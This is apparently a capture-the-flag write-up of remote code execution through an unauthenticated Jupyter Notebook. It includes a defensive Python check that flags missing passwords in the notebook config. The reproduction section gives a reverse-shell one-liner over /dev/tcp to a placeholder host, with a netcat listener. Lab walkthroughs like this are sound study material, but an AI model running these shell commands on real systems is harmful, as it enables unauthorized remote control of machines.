buuctf [Jupyter]notebook-rce
2022-06-10 12:47:00 【exploitsec】
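Jupyter Notebook unauthorized access vulnerability
Jupyter Notebook (formerly known as IPython notebook) is an interactive notebook that supports running more than 40 programming languages.
If the administrator has not configured a password for Jupyter Notebook, the result is an unauthorized access vulnerability: a visitor can create a console in it and execute arbitrary Python code and commands.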
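
A defender-side check for the misconfiguration described above, as an added example that is not part of the original post: it scans the text of a `jupyter_notebook_config.py` file and flags the case where token authentication is explicitly emptied and no password hash is set. The sample configurations are constructed, and the function name and the finding codes `auth-disabled` / `all-interfaces` are hypothetical; the `c.NotebookApp.*` keys (and the `c.ServerApp.*` equivalents) are Jupyter's own settings.

```python
import re

# Matches active (uncommented) assignments such as:
#   c.NotebookApp.token = ''      c.ServerApp.password = u'argon2:...'
_SETTING = re.compile(
    r"^\s*c\.(?:NotebookApp|ServerApp)\.(token|password|ip)\s*=\s*"
    r"u?(['\"])(.*?)\2\s*(?:#.*)?$"
)

def audit_jupyter_config(text):
    """Return finding codes for the text of a jupyter_notebook_config.py file."""
    settings = {}
    for line in text.splitlines():
        m = _SETTING.match(line)
        if m:
            settings[m.group(1)] = m.group(3)  # a later assignment wins
    findings = []
    # An unset token is safe: Jupyter then generates a random one at startup.
    # Only an explicitly empty token with no password hash disables authentication.
    if settings.get("token") == "" and settings.get("password", "") == "":
        findings.append("auth-disabled")
    # Listening on every interface makes a missing login reachable from the network.
    if settings.get("ip") in ("0.0.0.0", "*", "::"):
        findings.append("all-interfaces")
    return findings

# Constructed sample configurations (not taken from the original post).
WEAK_CONFIG = """\
c.NotebookApp.ip = '0.0.0.0'
c.NotebookApp.token = ''
c.NotebookApp.password = ''
"""

HARDENED_CONFIG = """\
# c.NotebookApp.token = ''
c.NotebookApp.ip = '127.0.0.1'
c.NotebookApp.password = 'argon2:PLACEHOLDER_HASH'  # constructed placeholder hash
"""

if __name__ == "__main__":
    print("weak:", audit_jupyter_config(WEAK_CONFIG))
    print("hardened:", audit_jupyter_config(HARDENED_CONFIG))
```

The check only reads literal assignments in the config file; settings passed on the command line or stored in a JSON config are outside what it sees.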

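Reproduction
Arbitrary commands can be executed from the console created via Terminal.

env prints the environment variables
Reverse shell
# Listen on the local machine
nc -lvp 5555
# Run on the target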
bash -i >& /dev/tcp/x.x.x.x/5555 0>&1
